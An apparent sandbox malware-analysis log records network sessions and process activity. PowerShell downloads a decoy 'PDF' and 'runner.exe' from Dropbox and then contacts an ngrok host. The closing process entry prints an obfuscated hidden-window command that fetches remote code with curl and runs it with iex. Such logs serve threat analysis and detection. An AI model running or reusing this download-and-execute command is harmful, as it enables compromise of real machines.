                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC1390INData Raw: a3 9a c1 c2 43 a0 f0 9c cf 84 2c dc 6f 77 dd ff 5e 04 27 23 01 db 3b d0 22 fa fd ca c2 00 94 91 17 e4 5e bb e4 28 b3 f2 09 87 4b 75 14 8e e0 c2 6f 3a 13 0a 28 96 4a ee 0a 6a 2c 09 f3 2c c2 e9 23 6a 8c ec 09 a0 e8 96 87 84 d2 68 a5 cd ca f5 ec 0a 46 60 f9 be 7b e8 5e a6 f5 2e a5 46 6e c8 a6 db bc 01 50 4b 07 08 1d fb 12 3a a0 00 00 00 23 01 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 6f 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 c1 4e 1c 31 0c bd f3 15 d6 9c 8a 34 a0 65 7b 82 1b 82 55 4f 85 aa 2d 97 aa 17 6f c6 b3 58 ca 38 51 e2 00 5a c4
                                                                                                                                                                                                                                                                                  Data Ascii: C,ow^'#;"^(Kuo:(Jj,,#jhF`{^.FnPK:#PK!-_locales/ro/messages.jsonUT6*g Ad/RN14e{UO-oX8QZ
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC1390INData Raw: cb 68 4b 0f 6e 3d 2c 91 9f b7 f2 c2 8f 9e 81 ed 64 91 89 5f c8 93 db ec d7 38 3e f4 ec 97 19 5a 11 ad f3 b8 82 28 3a 6c b3 ee 24 e1 50 fb 79 09 cf f1 ad 57 e9 76 70 aa 85 35 32 aa 0a 0f 41 0d 1c 63 cf 15 51 0d 8c 44 97 9c 43 b8 94 04 8f 60 5f 09 e2 4b c0 6e a2 3a 29 12 e1 86 4f 49 97 b9 92 11 e2 5a d6 16 fc 60 20 03 a5 d7 f5 68 06 5f 65 93 9a dd ad 65 97 51 8b ac 05 b4 69 a5 64 30 17 f8 1c 4a 1d 10 6c a0 02 36 20 1b 29 c2 cd 6a e6 f5 e9 55 66 60 81 a8 0e 0c 0c 22 4a e0 41 05 8c 7f 9c 57 46 cf 54 ff 32 7c 7d 9b 6e 4b 1e be a1 2b 8b 2c ea 96 fa 5c 18 5d 04 b1 51 7c 89 a2 45 6d 3a 0b 61 c3 6f a2 78 04 e6 19 c0 10 c1 b2 2f e8 63 ec 0d 6c f9 20 a0 26 d6 8b ea b0 75 64 be 5d fd c4 70 d9 3b b5 ed d4 f1 bc 8d 4d 4a b4 8e 05 bc 1a 18 57 05 34 4d 40 13 b4 28 e5 ea
                                                                                                                                                                                                                                                                                  Data Ascii: hKn=,d_8>Z(:l$PyWvp52AcQDC`_Kn:)OIZ` h_eeQid0Jl6 )jUf`"JAWFT2|}nK+,\]Q|Em:aox/cl &ud]p;MJW4M@(
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC1390INData Raw: 98 b9 ab 80 ac 82 c5 04 63 89 63 38 bd 2a 36 1c e9 9a 44 2a 3c 4e 2d ee 92 46 8e 50 dc e3 94 bb f5 61 c2 1d cf 5c 48 24 42 49 6c 12 12 d7 49 d9 ae b5 78 32 3e ee bd 6d 14 36 10 04 42 78 75 49 e8 56 12 9a c0 f8 4e 5b 9e a8 18 48 07 60 fa c4 f3 b8 1c e9 66 42 8d 56 0a 4d 3a 20 57 32 60 3d 87 5b 12 2d 22 e5 44 56 25 e1 21 a6 58 0d e8 46 f5 04 83 06 0e 87 28 fb a4 f0 19 18 b8 02 88 01 7c 80 61 ef 0c 9c e0 24 d3 07 48 c9 09 3f e2 9c 5e e9 89 97 4b 26 3f f6 66 0d 22 cf 03 86 52 31 81 e4 3a 97 fa 54 dc fb b0 49 d9 ef a1 7d 1a 46 e5 77 f4 02 a7 fd a6 7b 35 4f fa 61 2c 0d 6e 07 7a 72 4d 94 18 5d f3 fe 4e 2c 30 9b 6d f6 54 60 d0 58 d4 81 d8 05 43 89 9b 2d 91 75 b1 84 72 e5 82 16 5a a8 d1 8f 71 28 22 a2 ed 69 03 7e 0f 3a 87 3c 26 69 4c 4d 0a 36 d7 c7 a7 16 96 fa 98
                                                                                                                                                                                                                                                                                  Data Ascii: cc8*6D*<N-FPa\H$BIlIx2>m6BxuIVN[H`fBVM: W2`=[-"DV%!XF(|a$H?^K&?f"R1:TI}Fw{5Oa,nzrM]N,0mT`XC-urZq("i~:<&iLM6
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC1390INData Raw: f9 39 14 92 6f 30 19 61 42 16 3c c5 8e d8 b3 84 2e 10 d8 71 39 f8 5c 22 7b 60 27 ee 3a 3f 1a 26 6a f5 a8 f2 1f 13 ad 85 fc dd 51 24 58 d5 3c 25 19 9d fa 2b 81 d6 c7 4d 37 fd 9a e2 f2 53 ad 5f c1 c9 b9 41 f8 0f 77 84 84 39 d5 5c 7f 74 b0 dd bb 43 ac e6 be ce d5 bf df bb 77 82 1b a6 ff 9c 05 67 3a 77 fe 7a f2 5d 9a 09 4d 66 b5 8d f8 e6 d8 2d cb 4e 6d ee a3 82 48 7b c6 a8 5d b2 e8 52 97 3d e5 a5 b8 ef 36 ad cf 46 de f8 e7 8e 98 46 5f 0f 08 b5 d5 be 41 c5 77 eb e3 54 28 7a 31 07 87 c9 e3 1b f0 13 22 9f 73 e2 40 ce 5e e0 09 2d 54 01 dc 63 06 df 9b 0e c1 43 bf 5c bc 02 50 4b 07 08 c0 47 8a 9f 88 01 00 00 46 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6d 2f 6d 65 73 73 61 67 65
                                                                                                                                                                                                                                                                                  Data Ascii: 9o0aB<.q9\"{`':?&jQ$X<%+M7S_Aw9\tCwg:wz]Mf-NmH{]R=6FF_AwT(z1"s@^-TcC\PKGFPK!-_locales/km/message
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC1390INData Raw: 74 6f 40 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: to@Fi'W|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG|P_Cj*B5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6*g Ad/


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49758 | 172.64.41.3 | 443 | 7952 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:41:37 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-10 17:41:38 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Tue, 10 Dec 2024 17:41:38 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8eff06e0fcd1421b-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49760 | 172.64.41.3 | 443 | 7952 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:41:37 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-10 17:41:38 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Tue, 10 Dec 2024 17:41:38 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8eff06e0fdd1c352-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49757 | 162.159.61.3 | 443 | 7952 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:41:37 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-10 17:41:38 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:38 GMT
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                  CF-RAY: 8eff06e0fe4242d8-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
2024-12-10 17:41:38 UTC | 468 | IN | Data Ascii: wwwgstaticcom()


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49753 | 162.125.69.18 | 443 | 8592 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:41:37 UTC | 246 | OUT | GET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                  Host: www.dropbox.com
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
2024-12-10 17:41:38 UTC | 4091 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                  Content-Security-Policy: worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; img-src https://* data: blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hell [TRUNCATED]
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                  Location: https://uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.com/cd/0/get/CgChJqCRdRbWUm7TtbTWVMfwmP4neAvAliJqAmrMytKpYlGQhQrjBjH9XH16NyCWpFjZM7Rcd9WdomKiwbzIi1CuPK0ht4rYR0G3eeb_NMEnMOnNOMxCITGfzLmCkSPgF2rcW3VLbuZ1P1JsssXGh-tK/file?dl=1#
                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                  Set-Cookie: gvc=MzAzNjAwOTI3NjQwNzM2NjQwMDkzMjEwNTE4NzIzNDU4Mjk3MTc4; Path=/; Expires=Sun, 09 Dec 2029 17:41:38 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: t=HIfBQUDf6sB12VAZnIxGwcyJ; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:41:38 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=HIfBQUDf6sB12VAZnIxGwcyJ; Path=/; Expires=Wed, 10 Dec 2025 17:41:38 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=Fl8cbmpbZ8; Path=/; Expires=Wed, 10 Dec 2025 17:41:38 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                  Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:41:38 GMT
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:38 GMT
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 8971fe0150e241d4a6b3c7a517adf9c9
                                                                                                                                                                                                                                                                                  Connection: close
2024-12-10 17:41:38 UTC | 17 | IN | Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
Data Ascii: <!--status=302-->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49762 | 162.159.61.3 | 443 | 7952 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:41:38 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
2024-12-10 17:41:38 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49764 | 172.64.41.3 | 443 | 7952 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:41:38 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
2024-12-10 17:41:38 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49765 | 172.64.41.3 | 443 | 7952 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:41:38 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
2024-12-10 17:41:38 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49776 | 162.125.69.15 | 443 | 8592 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:41:40 UTC | 370 | OUT | GET /cd/0/get/CgChJqCRdRbWUm7TtbTWVMfwmP4neAvAliJqAmrMytKpYlGQhQrjBjH9XH16NyCWpFjZM7Rcd9WdomKiwbzIi1CuPK0ht4rYR0G3eeb_NMEnMOnNOMxCITGfzLmCkSPgF2rcW3VLbuZ1P1JsssXGh-tK/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                  Host: uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
2024-12-10 17:41:41 UTC | 761 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="Lewis Silkin LLP.pdf"; filename*=UTF-8''Lewis%20Silkin%20LLP.pdf
                                                                                                                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                  Etag: 1733684767914485d
                                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Server-Response-Time: 143
                                                                                                                                                                                                                                                                                  X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:40 GMT
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                  Content-Length: 106848
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: cce64588c89b4f498890faea0dfd3bfe
                                                                                                                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49790 | 162.125.69.18 | 443 | 8592 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:41:44 UTC | 212 | OUT | GET /scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                  Host: www.dropbox.com
2024-12-10 17:41:45 UTC | 4091 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                  Content-Security-Policy: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instr [TRUNCATED]
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                  Location: https://uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com/cd/0/get/CgDPeFSvLowGEXW92RFcU_wB9Trw3pFZ50koqTNyngcPBjlOUx6Mk-UmtJOPLSUbbFVUAvs399DdhSh4Vx13Ii9hXtV2PEIyScdLwUWZ78ELshdejUuD6dK4Y1NRzWpo2vF80QzCgctIQTMQC6uKosbo/file?dl=1#
                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                  Set-Cookie: gvc=ODY0MTA5ODg4MDQ5MTg3NzUxMTAxMzE3Nzg2MDk4MzA4MjY2NDg=; Path=/; Expires=Sun, 09 Dec 2029 17:41:44 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: t=LoG4-5UaCOwwYiB0kzXdYtNJ; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:41:44 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=LoG4-5UaCOwwYiB0kzXdYtNJ; Path=/; Expires=Wed, 10 Dec 2025 17:41:44 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=ovA5BE4ymE; Path=/; Expires=Wed, 10 Dec 2025 17:41:44 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                  Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:41:44 GMT
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:45 GMT
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: ea52e1fcbed0456f86255207ce65c823
                                                                                                                                                                                                                                                                                  Connection: close
2024-12-10 17:41:45 UTC | 17 | IN | Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49795 | 162.125.69.15 | 443 | 8592 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:41:47 UTC | 370 | OUT | GET /cd/0/get/CgDPeFSvLowGEXW92RFcU_wB9Trw3pFZ50koqTNyngcPBjlOUx6Mk-UmtJOPLSUbbFVUAvs399DdhSh4Vx13Ii9hXtV2PEIyScdLwUWZ78ELshdejUuD6dK4Y1NRzWpo2vF80QzCgctIQTMQC6uKosbo/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                  Host: uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
2024-12-10 17:41:48 UTC | 738 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="runner.exe"; filename*=UTF-8''runner.exe
                                                                                                                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                  Etag: 1733821048842868d
                                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Server-Response-Time: 211
                                                                                                                                                                                                                                                                                  X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:47 GMT
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                  Content-Length: 1843712
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 6f72b7f594144253a7ae166c8501f844
                                                                                                                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49800 | 18.192.31.165 | 443 | 8592 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:41:52 UTC | 228 | OUT | GET /metadata/3280fc306b2b1b17d755c31452bd62f7 HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                  Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
2024-12-10 17:41:54 UTC | 212 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                  Content-Length: 96
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:53 GMT
                                                                                                                                                                                                                                                                                  Server: Werkzeug/3.0.3 Python/3.12.8
                                                                                                                                                                                                                                                                                  Connection: close
2024-12-10 17:41:54 UTC | 96 | IN | Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 4e 6f 74 20 66 6f 75 6e 64 3c 2f 70 3e 0a
                                                                                                                                                                                                                                                                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>Not found</p>


                                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                                  Start time:12:41:13
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)
